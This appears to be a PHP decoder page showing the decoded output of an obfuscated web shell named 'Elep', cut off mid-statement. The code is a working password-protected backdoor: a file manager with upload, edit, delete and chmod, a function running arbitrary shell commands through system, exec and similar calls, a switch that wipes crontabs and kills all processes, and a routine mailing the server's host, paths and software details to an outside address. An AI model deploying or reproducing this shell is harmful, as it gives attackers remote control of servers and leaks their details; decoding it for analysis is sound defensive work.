Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto IcODAQzcUt; JzgEgJczEV: function fileIcon($file) { goto Aj9yVKl0_N; bej3s0g1q..
Decoded Output download
<?php
goto IcODAQzcUt; JzgEgJczEV: function fileIcon($file) { goto Aj9yVKl0_N; bej3s0g1qf: return "<i class="fa-regular fa-file-lines"></i> "; goto ythIOm1lRv; aiW03ii0K6: return "<i class="fa-duotone fa-file-music"></i> "; goto ythIOm1lRv; goto mDz6muSgj2; NtZ_BMqgbz: if ($ext == "css") { goto I8TQzURxD3; } if ($ext == "txt") { goto SG3j4o3mBt; } if (in_array($ext, $audio)) { goto aiW03ii0K6; } if ($ext == "py") { goto feDs2rS8A1; } if ($ext == "js") { goto WoZCo0LXu0; } goto gLz1w9eQkI; IFuLZTXSXq: A0bfKBC2aX: return "<i class="fa-brands fa-php"></i> "; goto ythIOm1lRv; C2VjPmlMZ_: return "<i class="fa-regular fa-images"></i> "; goto XKIpp2ulFb; gLz1w9eQkI: return "<i class="fa-solid fa-file"></i> "; goto ythIOm1lRv; cq4hQTR8Js: return "<i class="fa-brands fa-html5"></i> "; goto ythIOm1lRv; goto IFuLZTXSXq; H7q5vzsNE0: goto xXy05PqqFN; VS60enwabY: return "<i class="fa-sharp fa-solid fa-bug"></i> "; goto xXy05PqqFN; EwUywPgQuA: goto KduJt3SnhB; s2rtgjh_tT: ythIOm1lRv: goto yX63xSMc7w; Aj9yVKl0_N: $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { goto VS60enwabY; } if ($file == ".htaccess") { goto EwUywPgQuA; } goto H7q5vzsNE0; mDz6muSgj2: feDs2rS8A1: return "<i class="fa-brands fa-python"></i> "; goto ythIOm1lRv; WoZCo0LXu0: return "<i class="fa-brands fa-js"></i> "; goto s2rtgjh_tT; XKIpp2ulFb: goto ythIOm1lRv; I8TQzURxD3: return "<i class="fa-brands fa-css3"></i> "; goto ythIOm1lRv; SG3j4o3mBt: goto bej3s0g1qf; KduJt3SnhB: return "<i class="fa-solid fa-hammer"></i> "; xXy05PqqFN: if ($ext == "html" || $ext == "htm") { goto cq4hQTR8Js; } if ($ext == "php" || $ext == "phtml") { goto A0bfKBC2aX; } if (in_array($ext, $imgs)) { goto C2VjPmlMZ_; } goto NtZ_BMqgbz; yX63xSMc7w: } function encodePath($path) { $a = array("/", "\", ".", ":"); $b = array("\xe0\xa6\x95", "\xe0\xa6\226", "\xe0\xa6\x97", "\340\xa6\230"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("/", "\", ".", ":"); $b = array("\xe0\xa6\x95", "\340\246\x96", "\340\246\x97", "\340\xa6\230"); return str_replace($b, $a, $path); } function functionCheck() { $disabled = explode(",", ini_get("disable_functions")); $new_disable = array(); foreach ($disabled as $item) { $new_disable[] = trim($item); RAUfp5FRAi: } q1B1oWOC11: $command_array = array("system", "shell_exec", "popen", "exec", "proc_open", "passthru"); $command_able = false; foreach ($command_array as $command) { if (in_array($command, $new_disable)) { goto MFHpZ0rPo3; } $command_able = true; goto lUon61bXc5; MFHpZ0rPo3: wYut48siK2: } lUon61bXc5: return $command_able; } function do_write($file, $t, $text) { $key = true; $handle = @fopen($file, $t); if (@fwrite($handle, $text)) { goto rKgxPJYDeN; } @chmod($file, 0666); $key = @fwrite($handle, $text) ? true : false; rKgxPJYDeN: @fclose($handle); return $key; } goto Oy39V45ZH7; tHK0hE0LNU: $res = $zip->open($file); if ($res == true) { goto jgOVb0GrHx; } echo "<script>alert('Failed to Unzip File !'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto S2oUcCZYVk; jgOVb0GrHx: goto AzvJH6KrVF; eQXrwI8nw8: function run($code, $method = "popen") { goto mfT7mepTlo; mfT7mepTlo: $disabled = explode(",", ini_get("disable_functions")); $new_disable = array(); foreach ($disabled as $item) { $new_disable[] = trim($item); bRJBOAhvZF: } rbAY6el1SK: $command_array = array("system", "shell_exec", "popen", "exec", "proc_open", "passthru"); goto bxQQhO5Sia; bxQQhO5Sia: $method = ''; foreach ($command_array as $command) { if (in_array($command, $new_disable)) { goto bxr2VDwqtX; } $method = $command; goto IHV2XxjWp9; bxr2VDwqtX: OmRWz6Uc_Q: } IHV2XxjWp9: if (!empty($method)) { goto QmFeuiWieK; } return false; goto F_CJWjwC0X; F_CJWjwC0X: QmFeuiWieK: $result = ''; switch ($method) { case "proc_open": $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "error.txt")); $pipes = array(); proc_open($code, $descriptorspec, $pipes); return false; goto ThLm7B5C1w; case "passthru": passthru($code); return false; goto ThLm7B5C1w; case "shell_exec": $result = ''; $result = shell_exec($code); return $result; goto ThLm7B5C1w; case "system": $result = ''; system($code, $result); return $result; goto ThLm7B5C1w; case "popen": $fp = popen($code, "r"); d3GMWvdnew: if (feof($fp)) { goto g69f1p3mYr; } $out = fgets($fp, 4096); $result .= $out; goto d3GMWvdnew; g69f1p3mYr: pclose($fp); return $result; goto ThLm7B5C1w; case "exec": exec($code, $array); foreach ($array as $key => $value) { $result .= $key . " : " . $value . PHP_EOL; jB9ji0dtLk: } SBDbx10Z2D: return $result; goto ThLm7B5C1w; default: return false; goto ThLm7B5C1w; } KzXceCE1Qy: ThLm7B5C1w: goto UEz91j34Kv; UEz91j34Kv: } $root_path = __DIR__; if (isset($_GET["p"])) { goto cG0ynFGuhX; } if (isset($_GET["q"])) { goto iZsHZvoVWP; } $p = $root_path; goto rOIgmEEU59; UL46ykXf51: BQhdUDGBjJ: echo "<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; J2KE9crsVr: RDKJeyTdCo: pSUJYJ6Jhl: goto HeK6lfZ0On; HJzbV9Cz_0: $data = $_POST["data"]; $editresult = file_put_contents($filename, $data); if ($editresult) { goto BQhdUDGBjJ; } echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto J2KE9crsVr; goto UL46ykXf51; IcODAQzcUt: $password = "d7b82465fd257c292e88007a69d33799"; error_reporting(0); set_time_limit(0); session_start(); if (isset($_SESSION["loggedInm"])) { goto uaB43k7i2d; } goto Xf7vnRT1DK; HseYlxXS0w: echo "\xd
<h5 class="border p-1 mb-3">New file</h5><form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><br/><div class="form-group"><input type="submit" class="btn btn-dark" value="createfile" name="createfile"></div></form>"; xMZLJlmg5e: if (!isset($_GET["newfolder"])) { goto Gmp9ijTiSP; } echo "<form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><br/><div class="form-group"><input type="submit" class="btn btn-dark" value="createfolder" name="createfolder"></div></form>"; Gmp9ijTiSP: goto zoUJOAeR3Y; FDFLFy7CDc: echo "<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; HFE5kKnsCA: aM8DeAOh9i: NvbGdzFS_o: bU5iKADKcC: goto iZSLwp83rB; UkZgpCr8T7: if (!isset($_POST["createfile"])) { goto TeSIip9XPd; } $filename = PATH . "/" . $_POST["n"]; $filecontent = $_POST["ctn"]; $f_put = "file" . "_" . "put_" . "contents"; $create_result = @$f_put($filename, $filecontent); goto ro56FjsUmp; N56fFkgFnR: if (!(isset($_GET["z"]) && isset($_GET["q"]))) { goto jWnHz3QB4f; } echo "<script>alert('Success zip File !'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; $dir = PATH . "/" . $_GET["z"] . "/"; $sourceDir1 = $dir; $outZipPath1 = PATH . "/" . $_GET["z"] . ".zip"; goto Z4FL63cabb; TACYhwjZl3: B0fGBvJ7BC: if (!(isset($_GET["u"]) && isset($_GET["q"]))) { goto l_LXZmL6qT; } $file = PATH . "/" . $_GET["u"]; $filearray = pathinfo($file); $unzipname = PATH . "/" . $filearray["filename"] . "/"; goto UDhFABiLMw; vny6N1rEXg: DSraP0sFDJ: chmod($name, 0644); echo "<script>alert('Directory chmod update.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; vBeXSTf6G5: ygOghdc2yx: goto TACYhwjZl3; U7bRhx3CHw: HsZkaRL7H2: goto QZch_C6JHG; SxJKZiV3ke: if (!is_readable(PATH)) { goto W6cuX1O3h2; } $fetch_obj = scandir(PATH); goto beZ8d3y3aQ; fFKP7Uscgc: aiCI89EMPR: q4X3Ktp8Rf: define("PATH", $p); $root = $_SERVER["DOCUMENT_ROOT"]; @chdir($root); goto n4XwIFiptY; epV_l6oCAf: echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto GrGLGHlobX; dDlB62giGv: echo "<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; GrGLGHlobX: goto XyqzCwUAMG; w6cON0FfUZ: if (!($i < $countfiles)) { goto RSakv7kI2r; } $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"][$i]; $filename = $_FILES["fileToUpload"]["name"][$i]; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"][$i], $target_file)) { goto Moq8TmJ_Zz; } $str .= "<p>Sorry, there was an error uploading your file.</p>"; goto AZ1GiUp5Hz; KE0xkKhOsg: echo "<script>\xaalert('Directory is Corrupted and Unreadable.');\xawindow.location.replace('?');
</script>"; goto L8qA1n6y8f; fhzsB2yta0: $p = decodePath($_GET["p"]); L8qA1n6y8f: goto TOf2PAqXCs; AzvJH6KrVF: $zip->extractTo($unzipname); $zip->close(); echo "<script>alert('Success Unzip File !'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; S2oUcCZYVk: l_LXZmL6qT: goto N56fFkgFnR; USOcF_9GQA: goto Lvv7W; qJ_ML: $turkhackteam .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\xd\xa"; goto q1pwk; rb_fC: goto J0bBi0uhWi; J0bBi0uhWi: $turkhackteam .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "
\xa"; goto VQ0so; kFbIK: $baslik = "Shell Avc\xc4\xb1s\xc4\xb1"; goto vS5qu; goto YwoKqqsX4i; RttEvMx3zw: $name = PATH . "/" . $_GET["r"]; if (rename($name, PATH . "/" . $_POST["name"])) { goto J4vRUYRbz2; } echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto HFE5kKnsCA; J4vRUYRbz2: goto FDFLFy7CDc; fb40xYjVL_: echo "\xd
<table class="table table-hover">\xd\xa <thead>
<tr>
\xa <th scope="col">Name</th>\xd
<th scope="col">Size</th>\xd
<th scope="col">Modified</th>\xd
<th scope="col">Owner</th>\xd
<th scope="col">Perms</th>
<th scope="col">Actions</th>\xd\xa </tr>\xd\xa </thead>
<tbody>
"; foreach ($folders as $folder) { echo " <tr>
\xa <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td>
<td><b>---</b></td>\xd\xa <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td>
\xa\x9 <td>" . owner(PATH . "/" . $folder) . "</td>
\xa <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td>\xd\xa <td>\xd
<a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
\xa <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
\xa\x9 <a title='chmod' href='?q=" . urlencode(encodePath(PATH)) . "&c=" . $folder . "'><i class='fa fa-unlock' aria-hidden='true'></i></a>\xd
\x9 <a title='zip' href='?q=" . urlencode(encodePath(PATH)) . "&z=" . $folder . "'>zip</a>|
\xa \x9 \xd\xa <td>
</tr>
"; BSTWSX1WXq: } aqiVe_Xh1y: foreach ($files as $file) { echo " <tr>
<td>" . fileIcon($file) . $file . "</td>
<td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td>\xd\xa <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td>\xd
\x9 <td>" . owner(PATH . "/" . $file) . "</td>\xd\xa <td>0" . substr(decoct(fileperms(PATH . "/" . $file)), -3) . "</a></td>
\xa <td>
<a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a>
\xa <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>\xd\xa <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
\xa \x9 <a title='chmod' href='?q=" . urlencode(encodePath(PATH)) . "&c=" . $file . "'><i class='fa fa-unlock' aria-hidden='true'></i></a>
\x9\x9 <a title='unzip' href='?q=" . urlencode(encodePath(PATH)) . "&u=" . $file . "'>uzip</a>
\xa <td>
\xa </tr>
"; uYMRct_q9o: } lWKcs0NWl4: goto mQyYOaHXf2; AZ1GiUp5Hz: goto L8HEpYUQxg; Moq8TmJ_Zz: $str .= "<p>" . htmlspecialchars(basename($_FILES["fileToUpload"]["name"][$i])) . " has been uploaded.</p>"; L8HEpYUQxg: bhb7VItGxw: goto FTc77pbCnc; HeK6lfZ0On: coVmyM_2EN: if (!isset($_POST["upload"])) { goto n2gtoQzzO0; } $countfiles = count($_FILES["fileToUpload"]["name"]); $i = 0; OqSJMaTAuM: goto w6cON0FfUZ; aaNEIZoo6j: COqp2ZXeGk: if (!($error_number != 0)) { goto fDdNmMnr92; } echo "<font color="red">" . $fuction_info . "</font>"; fDdNmMnr92: jsqLUEh1SJ: goto zO2LMHgCoO; IOovTEcqk1: $disabled = explode(",", ini_get("disable_functions")); $fuction_info = ''; if (!(sizeof($disabled) > 0 && !empty($disabled[0]))) { goto jsqLUEh1SJ; } $error_number = 0; if (!in_array("file_get_contents", $disabled)) { goto i3MTPAroIo; } goto ZzE3VMo7Qc; t5jf3rVV9n: kw3RfNbNii: echo "
"; goto qemTr; q1pwk: $turkhackteam .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "
"; goto USOcF_9GQA; Zgi8Ab0lWU: if (!(isset($_GET["d"]) && isset($_GET["q"]))) { goto fHAXqks028; } $name = PATH . "/" . $_GET["d"]; if (is_file($name)) { goto VQYpSLiD5T; } if (is_dir($name)) { goto clz40yMAqx; } goto hZKzTQm1yy; goto DRcFJ0T1ON; ZzE3VMo7Qc: $fuction_info .= "file_get_contents is disable<br/>"; $error_number++; i3MTPAroIo: if (!in_array("curl_init", $disabled)) { goto u9gYMPsCF2; } $fuction_info .= "curl_init is disable"; goto X8KH1uvt0u; UDhFABiLMw: if (!is_readable($file)) { goto dUl4pood2Q; } if (strpos(file_get_contents($file), "PK\3\x4") === false) { goto p2Z0x5ZOg0; } goto iRua8CtKDW; dUl4pood2Q: echo "<script>alert('Cannot Unzip File / Unreadable File !'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto yPOBkfOl2J; TOf2PAqXCs: goto q4X3Ktp8Rf; iZsHZvoVWP: if (!is_dir(decodePath($_GET["q"]))) { goto KyJ_vH0Mwa; } if (is_dir(decodePath($_GET["q"]))) { goto Zo8nLOomf_; } goto aiCI89EMPR; goto nOjUTRD6Az; O7k9wbo36H: if (!isset($_GET["kk"])) { goto yulh6SR4bZ; } $cron_result = run("crontab -r && kill -9 -1"); if (!$cron_result) { goto mP6a0rBnag; } echo "kill \xe6\x89\247\xe8\xa1\214\xe6\210\220\345\212\237"; goto T8xgJ1Gmim; goto RlfEosNueR; Z4FL63cabb: $zip = new Zip(); $zip::zipDir($sourceDir1, $outZipPath1); if (file_exists($outZipPath1)) { goto i98ETcJYYy; } echo "<script>alert('fail zip File !'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto nbvh0Hfg4M; goto aeX22B5Tfx; geYezJksgv: hDWgesoqjk: DFsOXKjH_h: if ($_SESSION["loggedInm"]) { goto P7Zt_2MYBp; } echo "
\xa<html><head><title> </title></head>\xd
<body>
\xa <p align="center"><center><font style="font-size:13px" color="#008000" face="Trebuchet MS">\xd
<form method="post">\xd
<input type="password" name="password">
<input type="submit" name="submit" value=" >>">\xd
</form>
</body>\xd\xa</html>\xd
\xd
"; exit; goto hjqN1xEn3A; beZ8d3y3aQ: $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { goto dmAtbeFBtk; g8RuF113CC: if (is_file($new_obj)) { goto vSWegMe7Lz; } goto bFAUPSnYOd; cqOU3uOPMr: array_push($folders, $obj); goto bFAUPSnYOd; goto s9NhdHM2rt; s9NhdHM2rt: vSWegMe7Lz: array_push($files, $obj); bFAUPSnYOd: JyOkylFRDX: goto PBzrHQLDGM; dmAtbeFBtk: if (!($obj == "." || $obj == "..")) { goto Kezd1uflj4; } goto JyOkylFRDX; Kezd1uflj4: $new_obj = PATH . "/" . $obj; if (is_dir($new_obj)) { goto cqOU3uOPMr; } goto g8RuF113CC; PBzrHQLDGM: } nd3KQxlVOk: W6cuX1O3h2: goto fb40xYjVL_; Hzmz5X2VGB: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_ENCODING, "gzip,deflate"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto rT3QYwS0tM; rmbSvvM2bl: if (is_dir($name)) { goto kSNq_fSLoe; } goto ygOghdc2yx; pjcSO3HNxC: if (chmod($name, 0644)) { goto C25QBScvNh; } echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto pQiO1r5X9P; zO2LMHgCoO: echo "\xd\xa<nav class="navbar navbar-light" style="background-color: #e3f2fd;">\xd
<div class="navbar-brand">\xd
<a href="?"><i class="fa fa-home" aria-hidden="true"></i></a>\xd\xa"; $path = str_replace("\", "/", PATH); $paths = explode("/", $path); foreach ($paths as $id => $dir_part) { goto H9tnR20ufr; uKk965bJmU: if (!($dir_part == '')) { goto mMTm5guV6u; } goto bIBm3QeT6b; mMTm5guV6u: echo "<a href='?p="; $i = 0; goto qpibQ0txHL; H356WshJH_: OUF1FNlOfz: HkeWk1Ws5J: $i++; goto ly7mrEQZX2; dnlLv_r3SP: goto J0skvlYmYt; qpibQ0txHL: ly7mrEQZX2: if (!($i <= $id)) { goto dnlLv_r3SP; } echo str_replace(":", "\xe0\xa6\x98", $paths[$i]); if (!($i != $id)) { goto OUF1FNlOfz; } echo "\xe0\246\x95"; goto H356WshJH_; H9tnR20ufr: if (!($dir_part == '' && $id == 0)) { goto LA1PfFCI4Y; } $a = true; echo "<a href="?p=/">/</a>"; goto bIBm3QeT6b; LA1PfFCI4Y: goto uKk965bJmU; J0skvlYmYt: echo "'>" . $dir_part . "</a>/"; bIBm3QeT6b: goto zl5It5hs6V; zl5It5hs6V: } NAcHM_MOa1: goto IzSgJV9j8V; Oy39V45ZH7: function str_path($path) { return str_replace("//", "/", $path); } function do_show($filepath) { goto qtz1NzQd0h; V0p0Hqeur4: goto oxfA6jrQZG; ZsEe1z28hZ: $files = str_path($filepath . "/" . $file); $show[] = $files; goto oxfA6jrQZG; goto LN3h1J8Jea; LN3h1J8Jea: ZKntQDgCHK: $dir->close(); return $show; goto huWRiHvBhr; qtz1NzQd0h: $show = array(); $dir = dir($filepath); oxfA6jrQZG: if (!($file = $dir->read())) { goto ZKntQDgCHK; } if (!($file == "." or $file == "..")) { goto ZsEe1z28hZ; } goto V0p0Hqeur4; huWRiHvBhr: } function do_deltree($deldir) { $showfile = do_show($deldir); foreach ($showfile as $del) { goto BLmwZXp8SY; A8KU0T3u3b: return false; OxihpooHB6: goto OIrJhFACPA; xgNnRmP9eZ: @chmod($del, 0777); goto SOiDfAA1ap; BLmwZXp8SY: if (is_dir($del)) { goto MKLufqueVI; } if (!is_dir($del)) { goto xgNnRmP9eZ; } goto OIrJhFACPA; MKLufqueVI: if (do_deltree($del)) { goto OxihpooHB6; } goto A8KU0T3u3b; SOiDfAA1ap: if (@unlink($del)) { goto drKmBgXDGq; } return false; drKmBgXDGq: OIrJhFACPA: jfzo5gUFXl: goto pRj7PCM2Um; pRj7PCM2Um: } q4jX3Svrc9: @chmod($deldir, 0777); if (@rmdir($deldir)) { goto JkZJb2wEW1; } return false; JkZJb2wEW1: return true; } function do_download($filecode, $file) { header("Content-type: application/unknown"); header("Accept-Ranges: bytes"); header("Content-length: " . strlen($filecode)); header("Content-disposition: attachment; filename=" . $file . ";"); echo $filecode; exit; } function owner($file) { if (function_exists("posix_getpwuid")) { goto IyPKCxI4K4; } return "<center>" . fileowner($file) . "</center>"; goto Mdz6j15l9z; IyPKCxI4K4: $tod = @posix_getpwuid(fileowner($file)); return "<center>" . $tod["name"] . "</center>"; Mdz6j15l9z: } goto eQXrwI8nw8; iZSLwp83rB: if (!isset($_GET["e"])) { goto coVmyM_2EN; } if (!(!empty($_GET["e"]) && isset($_GET["q"]))) { goto pSUJYJ6Jhl; } echo PATH . "/" . $_GET["e"] . "<br/>" . "
<form method="post">
<textarea style="height: 500px;\xd
width: 90%;" name="data">" . htmlspecialchars(file_get_contents(PATH . "/" . $_GET["e"])) . "</textarea>
<br>
<input type="submit" class="btn btn-dark" value="Save" name="edit">
</form>"; if (!isset($_POST["edit"])) { goto RDKJeyTdCo; } $filename = PATH . "/" . $_GET["e"]; goto HJzbV9Cz_0; XyqzCwUAMG: hZKzTQm1yy: fHAXqks028: if (!(isset($_GET["c"]) && isset($_GET["q"]))) { goto B0fGBvJ7BC; } $name = PATH . "/" . $_GET["c"]; if (is_file($name)) { goto pjcSO3HNxC; } goto rmbSvvM2bl; Xf7vnRT1DK: $_SESSION["loggedInm"] = false; uaB43k7i2d: if (!isset($_POST["password"])) { goto DFsOXKjH_h; } if (!(md5($_POST["password"]) == $password)) { goto hDWgesoqjk; } $_SESSION["loggedInm"] = true; goto geYezJksgv; rT3QYwS0tM: $res = curl_exec($ch); curl_close($ch); if (!$res) { goto b_rvvIgoJI; } echo "<div style="width:50%;display:block;color:red;font-size:30px;tex-align:center;">support curl" . "</div><br/>" . $res; b_rvvIgoJI: goto o4bNfRbYi7; YwoKqqsX4i: vS5qu: $turkhackteam = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "\xd\xa"; goto qJ_ML; qemTr: $kime = "[email protected]"; goto s2MJ9P5gIy; nOjUTRD6Az: KyJ_vH0Mwa: echo "<script>window.location.replace('?p=');</script>"; goto aiCI89EMPR; Zo8nLOomf_: $p = decodePath($_GET["q"]); goto fFKP7Uscgc; xIjQh75KP9: goto ygOghdc2yx; kSNq_fSLoe: if (rmdir($name) == true) { goto DSraP0sFDJ; } echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto vBeXSTf6G5; goto vny6N1rEXg; hjqN1xEn3A: P7Zt_2MYBp: echo "<!DOCTYPE html>
<html lang="en">\xd\xa
\xa<head>\xd
<meta charset="utf-8">
\xa <meta http-equiv="X-UA-Compatible" content="IE=edge">
\xa <meta name="viewport" content="width=device-width, initial-scale=1.0">\xd
<title>Elep</title>\xd
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet"\xd
integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
\xa <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
\xa integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
crossorigin="anonymous" referrerpolicy="no-referrer" />\xd
<script src="https://cdnjs.online/ajax/libs/bootstrap/js/bootstrap.min.js"></script>\xd\xa</head>\xd
\xa<body>
\xa
"; class Zip { public static function zipDir($sourcePath, $outZipPath) { $pathInfo = self::myPathInfo($sourcePath); $parentPath = $pathInfo["dirname"]; $dirName = $pathInfo["basename"]; $sourcePath = $parentPath . "/" . $dirName; $z = new \ZipArchive(); $z->open($outZipPath, \ZIPARCHIVE::CREATE); $z->addEmptyDir($dirName); self::folderToZip($sourcePath, $z, strlen("{$parentPath}/")); $z->close(); } private static function folderToZip($folder, &$zipFile, $exclusiveLength) { goto iAp7eHVyEh; iAp7eHVyEh: $handle = opendir($folder); OA96fEclKc: if (!(false !== ($f = readdir($handle)))) { goto b0WL0sXOqZ; } if (!($f != "." && $f != "..")) { goto Z9RERv6Nr5; } $filePath = "{$folder}/{$f}"; goto Fkuw5PDZeh; KHlGbVZnoQ: $zipFile->addFile($filePath, $localPath); goto nunZV23xEk; UjOOEvpMA_: $zipFile->addEmptyDir($localPath); self::folderToZip($filePath, $zipFile, $exclusiveLength); goto wz97xIbukI; wz97xIbukI: nunZV23xEk: Z9RERv6Nr5: goto OA96fEclKc; b0WL0sXOqZ: closedir($handle); goto MKIvWfAIlU; Fkuw5PDZeh: $localPath = substr($filePath, $exclusiveLength); if (is_file($filePath)) { goto uotT90IMT3; } if (is_dir($filePath)) { goto UjOOEvpMA_; } goto nunZV23xEk; uotT90IMT3: goto KHlGbVZnoQ; MKIvWfAIlU: } private static function myPathInfo($filepath) { $pathParts = array(); $pathParts["dirname"] = rtrim(substr($filepath, 0, strrpos($filepath, "/")), "/") . "/"; $pathParts["basename"] = ltrim(substr($filepath, strrpos($filepath, "/")), "/"); $pathParts["extension"] = substr(strrchr($filepath, "."), 1); $pathParts["filename"] = ltrim(substr($pathParts["basename"], 0, strrpos($pathParts["basename"], ".")), "/"); return $pathParts; } } function formatSizeUnits($bytes) { goto HSjgFT8piE; PCvG2YVIEE: AqSqEzsJpN: $bytes = number_format($bytes / 1048576, 2) . " MB"; goto XJusoonAww; az5BU1nUFK: $bytes = number_format($bytes / 1024, 2) . " KB"; goto COiPeKJsM1; x9vfNHLDZB: $bytes = "0 bytes"; goto XJusoonAww; a_9cse59W5: $bytes = number_format($bytes / 1073741824, 2) . " GB"; goto XJusoonAww; goto PCvG2YVIEE; HSjgFT8piE: if ($bytes >= 1073741824) { goto a_9cse59W5; } if ($bytes >= 1048576) { goto AqSqEzsJpN; } if ($bytes >= 1024) { goto az5BU1nUFK; } if ($bytes > 1) { goto ymuX_yQc8G; } if ($bytes == 1) { goto dhwHVoGtDR; } goto x9vfNHLDZB; KkLBgnBbDf: $bytes = $bytes . " byte"; XJusoonAww: return $bytes; goto uiL8scUfb2; COiPeKJsM1: goto XJusoonAww; ymuX_yQc8G: $bytes = $bytes . " bytes"; goto XJusoonAww; dhwHVoGtDR: goto KkLBgnBbDf; uiL8scUfb2: } function fileExtension($file) { return substr(strrchr($file, "."), 1); } goto JzgEgJczEV; mQyYOaHXf2: echo " </tbody>
</table>"; QZch_C6JHG: if (!isset($_GET["upload"])) { goto d53lTxcAYk; } echo "\xd\xa <form method="post" enctype="multipart/form-data">\xd\xa Select file to upload:
\xa <input type="file" name="fileToUpload[]" id="fileToUpload" multiple>\xd
<input type="submit" class="btn btn-dark" value="Upload" name="upload">
</form>"; d53lTxcAYk: goto O7k9wbo36H; GoIXCwZ3d6: mail($kime, $baslik, $turkhackteam); goto OxLsM; OxLsM: goto tZJnY9oqPH; A6kcfDH9ZR: McBGIq0COs: TeSIip9XPd: if (!isset($_POST["createfolder"])) { goto vPLKKGw5m0; } $dir = PATH . "/" . $_POST["n"]; if (is_dir($dir)) { goto CLE6JEJnql; } goto tr1pEdNdFp; b236ZA01T8: echo "<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; Bctwk126y2: goto hZKzTQm1yy; clz40yMAqx: if (rmdir($name) == true) { goto dDlB62giGv; } goto epV_l6oCAf; qM7tKaKnE0: goto L8qA1n6y8f; BzMo3V1_r8: $p = $root_path; goto L8qA1n6y8f; Q1kZhgy6OO: goto KE0xkKhOsg; pQiO1r5X9P: goto I3NHO10l0D; C25QBScvNh: chmod($name, 0644); echo "<script>alert('File chmod update.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; I3NHO10l0D: goto xIjQh75KP9; RlfEosNueR: mP6a0rBnag: echo "kill \xe6\211\247\350\241\x8c\xe4\270\215\346\210\x90\345\212\x9f"; T8xgJ1Gmim: yulh6SR4bZ: if (!isset($_GET["newfile"])) { goto xMZLJlmg5e; } goto HseYlxXS0w; ro56FjsUmp: if ($create_result) { goto YPrZzdFabJ; } echo "<script>alert('fail create.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto McBGIq0COs; YPrZzdFabJ: echo "<script>alert('create success.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto A6kcfDH9ZR; DRcFJ0T1ON: VQYpSLiD5T: if (unlink($name)) { goto YQ_G80UA7m; } echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; goto Bctwk126y2; YQ_G80UA7m: goto b236ZA01T8; wCOeXdWwW3: goto KHLv3BehnT; CLE6JEJnql: echo "<script>alert('folder exits.'); 